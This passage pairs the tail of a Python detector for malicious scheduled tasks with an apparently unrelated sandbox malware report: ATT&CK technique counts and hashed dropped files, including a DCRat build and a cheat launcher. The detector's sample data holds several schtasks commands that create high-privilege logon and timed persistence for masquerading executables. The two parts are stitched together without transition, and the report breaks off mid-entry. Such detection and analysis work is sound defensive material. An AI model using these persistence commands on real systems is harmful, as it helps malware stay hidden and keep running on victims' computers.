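    r'''schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\Application Data\cmd.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /f''',
    r'''schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\System.exe'" /rl HIGHEST /f''',
]

if __name__ == "__main__":
    for t in scan(SAMPLE_COMMAND_LINES):
        print(f"{t.name:<8} {t.schedule:<8} -> {t.target}")
        for finding in t.findings:
            print("    !", finding)
```

Feed it process-creation command lines (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) rather than the output of schtasks /query, which shows the stored action but not the /create invocation. The tokenizer is deliberately not shlex: posix-mode shlex strips the backslashes from unquoted Windows paths, and the masquerade check depends on the directory surviving intact.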
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter (1)
PowerShell (1)
Scheduled Task/Job (1)
Scheduled Task (1)
Persistence
Boot or Logon Autostart Execution (2)
Registry Run Keys / Startup Folder (1)
Winlogon Helper DLL (1)
Event Triggered Execution (1)
Netsh Helper DLL (1)
Scheduled Task/Job (1)
Scheduled Task (1)
Privilege Escalation
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
Boot or Logon Autostart Execution (2)
Registry Run Keys / Startup Folder (1)
Winlogon Helper DLL (1)
Event Triggered Execution (1)
Netsh Helper DLL (1)
Scheduled Task/Job (1)
Scheduled Task (1)
Defense Evasion
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
Hide Artifacts (2)
Hidden Files and Directories (2)
Impair Defenses (1)
Disable or Modify Tools (1)
Modify Registry (4)
Virtualization/Sandbox Evasion (1)
Downloads
-
C:\Program Files (x86)\Windows Photo Viewer\conhost.exe
Filesize 4.0MB
MD5 6cf5f23f1c8ca3bc6342506baac300da
SHA1 18affb87f0e996d202f0be3b8109701120ea3995
SHA256 f3ee0a31d29b515d2e0bf776507897ca3ef5605d0470adcc4163209ba78e3445
SHA512 66830da8515a32f3cf03149f0b23398265cbad452be1e81bfbaa2fb553e607ab498b2e6d2af06d9ec840236c2fe7d964443ed4f2ab4d9e50bd07ecf1aa70335b
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-as.hyb
Filesize 703B
MD5 8961fdd3db036dd43002659a4e4a7365
SHA1 7b2fa321d50d5417e6c8d48145e86d15b7ff8321
SHA256 c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe
SHA512 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-hi.hyb
Filesize 687B
MD5 0807cf29fc4c5d7d87c1689eb2e0baaa
SHA1 d0914fb069469d47a36d339ca70164253fccf022
SHA256 f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42
SHA512 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\hyph-nb.hyb
Filesize 141KB
MD5 677edd1a17d50f0bd11783f58725d0e7
SHA1 98fedc5862c78f3b03daed1ff9efbe5e31c205ee
SHA256 c2771fbb1bfff7db5e267dc7a4505a9675c6b98cfe7a8f7ae5686d7a5a2b3dd0
SHA512 c368f6687fa8a2ef110fcb2b65df13f6a67feac7106014bd9ea9315f16e4d7f5cbc8b4a67ba2169c6909d49642d88ae2a0a9cd3f1eb889af326f29b379cfd3ff
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_881296411\manifest.json
Filesize 179B
MD5 273755bb7d5cc315c91f47cab6d88db9
SHA1 c933c95cc07b91294c65016d76b5fa0fa25b323b
SHA256 0e22719a850c49b3fba3f23f69c8ff785ce3dee233030ed1ad6e6563c75a9902
SHA512 0e375846a5b10cc29b7846b20a5a9193ea55ff802f668336519ff275fb3d179d8d6654fe1d410764992b85a309a3e001cede2f4acdec697957eb71bdeb234bd8
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.fingerprint
Filesize 66B
MD5 0c9218609241dbaa26eba66d5aaf08ab
SHA1 31f1437c07241e5f075268212c11a566ceb514ec
SHA256 52493422ac4c18918dc91ef5c4d0e50c130ea3aa99915fa542b890a79ea94f2b
SHA512 5d25a1fb8d9e902647673975f13d7ca11e1f00f3c19449973d6b466d333198768e777b8cae5becef5c66c9a0c0ef320a65116b5070c66e3b9844461bb0ffa47f
-
C:\Program Files\chrome_Unpacker_BeginUnzipping2776_96477555\manifest.json
Filesize 134B
MD5 58d3ca1189df439d0538a75912496bcf
SHA1 99af5b6a006a6929cc08744d1b54e3623fec2f36
SHA256 a946db31a6a985bdb64ea9f403294b479571ca3c22215742bdc26ea1cf123437
SHA512 afd7f140e89472d4827156ec1c48da488b0d06daaa737351c7bec6bc12edfc4443460c4ac169287350934ca66fb2f883347ed8084c62caf9f883a736243194a2
-
C:\Users\Admin\AppData\Local\Temp\Built.exe
Filesize 24.0MB
MD5 68d3ea3afa53dedfd3593d140747b932
SHA1 757ff4ea1105bdcc861c98872cb28f3a32b170e9
SHA256 97e31ae693f118965c81672374dfa269f2b5c3c2b9502ac983f8b5817d5d0002
SHA512 b72adb6eed395db98f9bd3452c82252807320ed682cd585714fa4d526b6644ea873a62914f5fed2989fcf85f7b2e9472e37c2e3bbfb92867a2747ccee8ef8048
-
C:\Users\Admin\AppData\Local\Temp\CheatLauncherV2.exe
Filesize 11.4MB
MD5 108590051fab4871af861b8b12ad1e96
SHA1 172d10992c078145e1439e85869dcee89e95819b
SHA256 7d11195746ed7866dce67ebe82dd5c9bdc6f3251528a9d40c22be61612f71d1a
SHA512 27863d3991e490d69f199d8bf3ea521bee1cfe18336fcf64960c5fa16cd4ec7fc7e4a74f4795b9ffeed194326f6f28dc800569b0e6f7d2bb8647d64f37c2d544
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
Filesize 4.3MB
MD5 2edb71dd3792b6f6a774edbf67bb78d2
SHA1 7a8cff8359caec23a66212118ce4edd1e239bfeb
SHA256 9daadd6e7cbd889a2a05fa94d2876710542332a79782cec38c09e9079415b6ae
SHA512 aa9bb70014a07b181960bd9ea1c1106f046f123f24a263c45ab58a461245e141a0ad3af7d7b17e0cc59675fe1934f62a735756d52d068474690828fe6b44719f
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc
Filesize 139B
MD5 d0104f79f0b4f03bbcd3b287fa04cf8c
SHA1 54f9d7adf8943cb07f821435bb269eb4ba40ccc2
SHA256 997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a
SHA512 daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrc
Filesize 43B
MD5 c28b0fe9be6e306cc2ad30fe00e3db10
SHA1 af79c81bd61c9a937fca18425dd84cdf8317c8b9
SHA256 0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641
SHA512 e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\hasown\.nycrc
Filesize 216B
MD5 c2ab942102236f987048d0d84d73d960
SHA1 95462172699187ac02eaec6074024b26e6d71cff
SHA256 948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a
SHA512 e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\vary\LICENSE
Filesize 1KB
MD5 13babc4f212ce635d68da544339c962b
SHA1 4881ad2ec8eb2470a7049421047c6d076f48f1de
SHA256 bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400
SHA512 40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Filesize 90KB
MD5 d84e7f79f4f0d7074802d2d6e6f3579e
SHA1 494937256229ef022ff05855c3d410ac3e7df721
SHA256 dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227
SHA512 ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\AutoLaunchProtocolsComponent\1.0.0.8\protocols.json
Filesize 3KB
MD5 6bbb18bb210b0af189f5d76a65f7ad80
SHA1 87b804075e78af64293611a637504273fadfe718
SHA256 01594d510a1bbc016897ec89402553eca423dfdc8b82bafbc5653bf0c976f57c
SHA512 4788edcfa3911c3bb2be8fc447166c330e8ac389f74e8c44e13238ead2fa45c8538aee325bd0d1cc40d91ad47dea1aa94a92148a62983144fdecff2130ee120d
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat
Filesize 280B
MD5 8db5a944ef45d46abec0f3249afdb156
SHA1 dfd8f53aae680fdf79710a8bd41afb871aaa263e
SHA256 d15c91047f0b61fe927611af5c87bfefce16499320c08d71afceabbaee0ed02c
SHA512 1377e5c3513157ffd76fa338d5371ea4c00bab4a86571ce22d148428886bea4b7259fad687ec510c4e26f02bb08c17938b71a7d9d265f91baf262beb9ebaecf8
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\0c6e5283-4d22-408b-ba9a-1fb68676ae22.tmp
Filesize 6KB
MD5 af6cfdd9191f4afccabd16244ca2a23f
SHA1 20695cb3beb49de5395cdfa09ac25d7d6196a584
SHA256 14f02ff128993dd96eb01e332859fa5e3cac65b85ad662a6900eb9f74cbd34af
SHA512 1913c96f547f700bcedced36a417d2ed71c38b1385aead3c1f4996c92b450cece9a3dc99338335ab296300becde68db6a1eb35078164257648b027c0b8798a6d
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension Rules\MANIFEST-000001
Filesize 41B
MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\Network Persistent State
Filesize 1KB
MD5 94372efe4db92ace8998cddf12fd1ef7
SHA1 a61f139a25c90e1d92205c64890d82d1a3ec5126
SHA256 4ada8f29a1ececd2084fb7ed1702a57a692151ca43a6ef0ff005542d87d0017e
SHA512 cafb5bd0d74573c9f6cffdbc55c66d8428beba733fdea88560359e5cdd8c55429b5cf2efde6efec1db873d2084ee041e6f22fe5073f80799429deb2c49459b50
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\Network Persistent State~RFe58a19a.TMP
Filesize 59B
MD5 2800881c775077e1c4b6e06bf4676de4
SHA1 2873631068c8b3b9495638c865915be822442c8b
SHA256 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512 e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports
Filesize 2B
MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT
Filesize 16B
MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_0
Filesize 44KB
MD5 669ffa997106ec4bf86a78320461d3a6
SHA1 77a9e0cbcac9139c32ec8bbc1ed9e94d596aebc9
SHA256 2a79792475455e0529059ad25dad9fa51a583964e0a0d5359291e57c3ca90c07
SHA512 503f95f079168834c8008cfbbf30093cd60949e9fa6ca26904fff0c8d510c92d669b4459b4b72373248ef672cca88c0b6eb95bc11bd8cbd70497234388e9eabb
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_1
Filesize 264KB
MD5 f471b2d9c118a50cebcd8b3f86c7b9e6
SHA1 88f7eb54e201c667bc4a7aff7bd55fab39c1989d
SHA256 c5a88ecd0b0b14e184d1d55f57804a131b4be646d873e5346e73f6b85440dbf9
SHA512 fd9602c14d02a994051b8131afa6c09b7ea605ddd74d921ec7b953799a4baa04d61dfbada30532f8688750d3e5194bbc4c8e38804166ae65445a7a52b9d81413
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_2
Filesize 8KB
MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_3
Filesize 4.0MB
MD5 c75766c7e2964f7f9fb467476d0370c4
SHA1 e83a6fda53d23d166a726a017c80276ea7cf8b60
SHA256 602b36cb92d857a6231d1e8d3df1dd6bf19d3aab33e9163ee319c4d4e294ba54
SHA512 22a17cd55f161d052c027f36e42d5d354d94a90edc5d49a69650fa0da5ad7747abd78aa185e1eedf5fe610b9409a822fa72063affb849d301c68c87d331c6b1e
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
Filesize 2KB
MD5 d96776a1c0bd5f283ae007523586e2a4
SHA1 885cf46168aad612272eaa87e3f126ecf11266d1
SHA256 539282a12a71d997ee39d9b6f8c66977a917d3717a3e6aed64aceae7656046b3
SHA512 d0f68429910d59954e562697e9a0db836dc4c05cc6ef98ca7ad5db018e2dff0b1b9221c9f6cfdebfe254c80cc83a3da08707c8803d098e098328079bec1f5779
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
Filesize 3KB
MD5 3390d2891d34a377750bedec6b0d5caa
SHA1 08de62845722d4bb1a763e97061e39549a8d28a3
SHA256 5c46d0b5f725f75686af8f4fe6b70a90fe003c03e678b682f71af6dfd9c4d2eb
SHA512 ea4448a08740748b0f5ccca63d4644445c7d4ad517d4467080d8389c0dc6cd9e6f14798026768de55fc309558fab3e439ae8fd93eb1a63d64c47c56de62fc211
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
Filesize 16KB
MD5 770a6f0026613414c65febad41530417
SHA1 f7f9ca06f4a60404280d568ffe7c63a256229eb5
SHA256 59e84305440c748ebb49aed954aa8b815c278314e1c12362aaa3540dbf5d7f1f
SHA512 1e11b853d96d7c23fcc072109a4349d03f4b1e80b448998a4c122993249173e36253df650f6b71d9d544ad94d449012c1822afcee996532763bae8fbca8b7aca
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
Filesize 1KB
MD5 bc7294d5046c8136c991240800860905
SHA1 36c0c3add68ea3f7515e84b00cc72cd8a7f727b7
SHA256 7215bf587421455867d3b336c91dafba5ad164519dd272724b75895fb3780017
SHA512 94bc84881de5ea06a04a19ddae351d984ea4245a5c5072f6246936943e29745d34b4054560f320b94917203430ec8dee6c0a2c28f5a487133022750b5ff61b63
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe578973.TMP
Filesize 1KB
MD5 ede9201c6b9707d84c312be83877ecb2
SHA1 92f71e0f70f99ded9f363e820929778f12a9ce13
SHA256 1d4b0d190e029d4349e8974b9f4331946859746e2d5fc72dff27a6efb06f9f8f
SHA512 017efabdba1e9a52acbc4707f74e0a0a66c85d5bd4794113a8a761939e37c19b9e7773b75c3ba96a0638b0b216e15d1d737ba13ac871c0181d3064af4c4f4414
-
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
Filesize 13KB
MD5 6557bd5240397f026e675afb78544a26
SHA1 839e683bf68703d373b6eac246f19386bb181713
SHA256 a7fecfc225dfdd4e14dcd4d1b4ba1b9f8e4d1984f1cdd8cda3a9987e5d53c239
SHA512 f2399d34898a4c0c201372d2dd084ee66a66a1c3eae949e568421fe7edada697468ef81f4fcab2afd61eaf97bcb98d6ade2d97295e2f674e93116d142e892e97
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\VCRUNTIME140.dll
Filesize 116KB
MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_bz2.pyd
Filesize 48KB
MD5 980eff7e635ad373ecc39885a03fbdc3
SHA1 9a3e9b13b6f32b207b065f5fcf140aecfd11b691
SHA256 b4411706afc8b40a25e638a59fe1789fa87e1ce54109ba7b5bd84c09c86804e1
SHA512 241f9d3e25e219c7b9d12784ab525ab5ded58ca623bc950027b271c8dfb7c19e13536f0caf937702f767413a6d775bed41b06902b778e4bad2946917e16ad4ef
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ctypes.pyd
Filesize 59KB
MD5 a8cb7698a8282defd6143536ed821ec9
SHA1 3d1b476b9c042d066de16308d99f1633393a497a
SHA256 40d53a382a78b305064a4f4df50543d2227679313030c9edf5ee82af23bf8f4a
SHA512 1445ae7dc7146afbe391e131baff456445d7e96a3618bfef36dc39af978dd305e3a294acd62ee91a050812c321a9ec298085c7ad4eb9b81e2e40e23c5a85f2cc
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_decimal.pyd
Filesize 105KB
MD5 ccfad3c08b9887e6cea26ddca2b90b73
SHA1 0e0fb641b386d57f87e69457faf22da259556a0d
SHA256 bad3948151d79b16776db9a4a054033a6f2865cb065f53a623434c6b5c9f4aad
SHA512 3af88779db58dcae4474c313b7d55f181f0678c24c16240e3b03721b18b66bdfb4e18d73a3cef0c954d0b8e671cf667fc5e91b5f1027de489a7039b39542b8ca
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_hashlib.pyd
Filesize 35KB
MD5 89f3c173f4ca120d643aab73980ade66
SHA1 e4038384b64985a978a6e53142324a7498285ec4
SHA256 95b1f5eff9d29eb6e7c6ed817a12ca33b67c76acea3cb4f677ec1e6812b28b67
SHA512 76e737552be1ce21b92fa291777eac2667f2cfc61ae5eb62d133c89b769a8d4ef8082384b5c819404b89a698fcc1491c62493cf8ff0dcc65e01f96b6f7b5e14f
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_lzma.pyd
Filesize 86KB
MD5 05adb189d4cfdcacb799178081d8ebcb
SHA1 657382ad2c02b42499e399bfb7be4706343cecab
SHA256 87b7bae6b4f22d7d161aefae54bc523d9c976ea2aef17ee9c3cf8fe958487618
SHA512 13fc9204d6f16a6b815addf95c31ea5c543bf8608bfcc5d222c7075dd789551a202ae442fddc92ea5919ecf58ba91383a0f499182b330b98b240152e3aa868c5
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_queue.pyd
Filesize 26KB
MD5 fc796fcde996f78225a4ec1bed603606
SHA1 5389f530aaf4bd0d4fce981f57f68a67fe921ee1
SHA256 c7c598121b1d82eb710425c0dc1fc0598545a61ffb1dd41931bb9368fb350b93
SHA512 4d40e5a4ab266646bedacf4fde9674a14795dcfb72aae70a1c4c749f7a9a4f6e302a00753fe0446c1d7cc90caee2d37611d398fdc4c68e48c8bc3637dfd57c15
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_socket.pyd
Filesize 44KB
MD5 f8d03997e7efcdd28a351b6f35b429a2
SHA1 1a7ae96f258547a14f6e8c0defe127a4e445206d
SHA256 aef190652d8466c0455311f320248764acbff6109d1238a26f8983ce86483bf1
SHA512 40c9bce421c7733df37558f48b8a95831cc3cf3e2c2cdf40477b733b14bd0a8a0202bc8bc95f39fcd2f76d21deac21ad1a4d0f6218b8f8d57290968163effef8
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_sqlite3.pyd
Filesize 57KB
MD5 3d85e2aa598468d9449689a89816395e
SHA1 e6d01b535c8fc43337f3c56bfc0678a64cf89151
SHA256 6f0c212cb7863099a7ce566a5cf83880d91e38a164dd7f9d05d83cce80fa1083
SHA512 a9a527fc1fcce3ffe95e9e6f4991b1a7156a5ca35181100ea2a25b42838b91e39dd9f06f0efedb2453aa87f90e134467a7662dbbe22c6771f1204d82cc6cea82
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ssl.pyd
Filesize 65KB
MD5 615bfc3800cf4080bc6d52ac091ec925
SHA1 5b661997ed1f0a6ea22640b11af71e0655522a10
SHA256 1819dd90e26aa49eb40119b6442e0e60ec95d3025e9c863778dcc6295a2b561f
SHA512 1198426b560044c7f58b1a366a9f8afcde1b6e45647f9ae9c451fb121708aa4371673815be1d35ad1015029c7c1c6ea4755eb3701dbf6f3f65078a18a1daeacb
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\base_library.zip
Filesize 1.3MB
MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\blank.aes
Filesize 115KB
MD5 ad4224133f4be6fffe81e29c55ff87f3
SHA1 23415b5a3f4b1f2a14f17b8c974c3fca463362e1
SHA256 e63424d9dee3bed184080f147d197b95d7ff7a7be326aa7b3da9f3a763ba7b67
SHA512 dfc327fd4a5f6f15f5e37cdfeb9e9890d1a41c98ee7aa39f111dc654bdb64fe47d9b1be0064aa01326d0bd6bb4e874332765e0ad3c1f97176ff75fb441c0c328
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\libcrypto-3.dll
Filesize 1.6MB
MD5 7f1b899d2015164ab951d04ebb91e9ac
SHA1 1223986c8a1cbb57ef1725175986e15018cc9eab
SHA256 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986
SHA512 ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\libffi-8.dll
Filesize 29KB
MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\libssl-3.dll
Filesize 222KB
MD5 264be59ff04e5dcd1d020f16aab3c8cb
SHA1 2d7e186c688b34fdb4c85a3fce0beff39b15d50e
SHA256 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d
SHA512 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\python312.dll
Filesize 1.7MB
MD5 fb8bedf8440eb432c9f3587b8114abc0
SHA1 136bb4dd38a7f6cb3e2613910607131c97674f7c
SHA256 cb627a3c89de8e114c95bda70e9e75c73310eb8af6cf3a937b1e3678c8f525b6
SHA512 b632235d5f60370efa23f8c50170a8ac569ba3705ec3d515efcad14009e0641649ab0f2139f06868024d929defffffefb352bd2516e8cd084e11557b31e95a63
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\rar.exe
Filesize 615KB
MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\rarreg.key
Filesize 456B
MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\select.pyd
Filesize 25KB
MD5 08b4caeaccb6f6d27250e6a268c723be
SHA1 575c11f72c8d0a025c307cb12efa5cb06705561d
SHA256 bd853435608486555091146ab34b71a9247f4aaa9f7ecfbc3b728a3e3efde436
SHA512 9b525395dec028ef3286c75b88f768e5d40195d4d5adab0775c64b623345d81da1566596cc61a460681bc0adba9727afc96c98ad2e54ff371919f3db6d369b0c
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\sqlite3.dll
Filesize 644KB
MD5 482b3f8adf64f96ad4c81ae3e7c0fb35
SHA1 91891d0eabb33211970608f07850720bd8c44734
SHA256 1fbdb4020352e18748434ef6f86b7346f48d6fb9a72c853be7b05e0e53ebbb03
SHA512 5de56e00ab6f48ffc836471421d4e360d913a78ee8e071896a2cd951ff20f7a4123abd98adf003ce166dcc82aad248ebf8b63e55e14eceec8aa9a030067c0d1d
-
C:\Users\Admin\AppData\Local\Temp\_MEI20922\unicodedata.pyd
Filesize 295KB
MD5 27b3af74ddaf9bca239bf2503bf7e45b
SHA1 80a09257f9a4212e2765d492366ed1e60d409e04
SHA256 584c2ecea23dfc72ab793b3fd1059b3ea6fdf885291a3c7a166157cf0e6491c4
